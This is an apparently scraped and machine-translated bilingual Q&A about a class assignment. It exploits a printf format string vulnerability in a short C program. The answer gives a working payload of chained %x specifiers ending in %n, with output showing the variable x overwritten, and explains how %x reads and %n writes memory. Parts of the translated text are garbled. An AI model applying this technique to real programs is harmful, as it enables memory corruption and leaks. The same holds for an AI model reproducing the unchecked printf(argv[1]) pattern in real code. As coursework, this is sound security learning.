[英]Exploiting Printf Vulnerability in C
As part of an assignment, I am expected to exploit the printf() vulnerability in the C code shared below. 作为任务的一部分,我希望利用下面共享的C代码中的printf()漏洞。 It should be in a way that when I run the code with a string (eg. ./format "foo"), I should change the "1" in "X equals to 1" with something else.
应该以某种方式在我使用字符串运行代码时(例如./format“ foo”),我应该用其他方式更改“ X equals 1”中的“ 1”。 I believe I need to change the value of X variable but if you have a different idea, please do not hesitate to share.
我相信我需要更改X变量的值,但是如果您有其他想法,请不要犹豫。 Here is the code:
这是代码:
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char **argv)
{
int *p;
int x = 1;
p=&x;
printf("x=%d, sizeof(x): %zu, %x = %p, sizeof((p):%zu,&p = %p, \n", x, sizeof(x), &x, sizeof(p),&p);
printf(argv[1]);
printf("\nX equals: %d \n", x);
return 0;
}
You can find a pretty decent information ( Format string attack ) about vulnerabilities in print when no using validations properly. 如果没有正确使用验证,您会发现有关打印漏洞的相当不错的信息( 格式字符串攻击 )。
I played a little with it and when running the program with like this: 我玩了一点,当运行程序时像这样:
./format "Bob %x %x %x %x %x %x %x %x%n"
Will cause the following print: 将导致以下打印:
x=1, sizeof(x): 4, &x = 0x7fffa9c36e14, sizeof((p):8,&p = 0x7fffa9c36e18,
Bob 81688000 81464ab0 3 81688048 3 a9c36f08 400410 a9c36f00
X equals: 59
If you replace the %n
with %x
you will be able to see the address of the variable x
. 如果将
%n
替换为%n
%x
您将能够看到变量x
的地址。 Because %x
reads from the process memory and %n
writes to the process memory I was able to change the data inside of x
(59 is the number of characters up to %n
when printing) 因为
%x
从过程存储器读取并且%n
向过程存储器写入,所以我能够更改x
内部的数据(59是打印时最多%n
的字符数)
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.